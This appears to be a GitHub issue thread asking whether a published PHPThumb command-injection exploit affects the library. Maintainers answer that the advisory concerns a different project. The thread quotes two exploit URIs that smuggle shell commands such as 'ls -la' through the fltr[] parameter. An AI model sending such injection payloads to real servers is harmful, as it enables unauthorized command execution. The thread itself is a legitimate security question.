PHPThumb
PHPThumb copied to clipboard
Command Injection Vulnerability?
When googling for "PHPThumb", one of the suggested searches is "PHPThumb exploit". One of the results links to this:
http://www.securityfocus.com/bid/39605/exploit
Attackers can exploit this issue via a browser. Reports indicate that this issue is being exploited in the wild.
The following example URIs are available:
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=Z:/home/example.com/www/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "Z:/home/example.com/www/kartinka.jpg" jpeg:"Z:/home/example.com
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9
Is this is an actual issue?
Hi, PHPThumb is a library, it does not implements the image serving so it is pure to the user how will use it. But this library seems abandoned, I recommend you to use avalanche123/Imagine instead.
@dliebner The security exploit You linked to is not related to this particular library - it's just a popular name for thumbnailing libraries.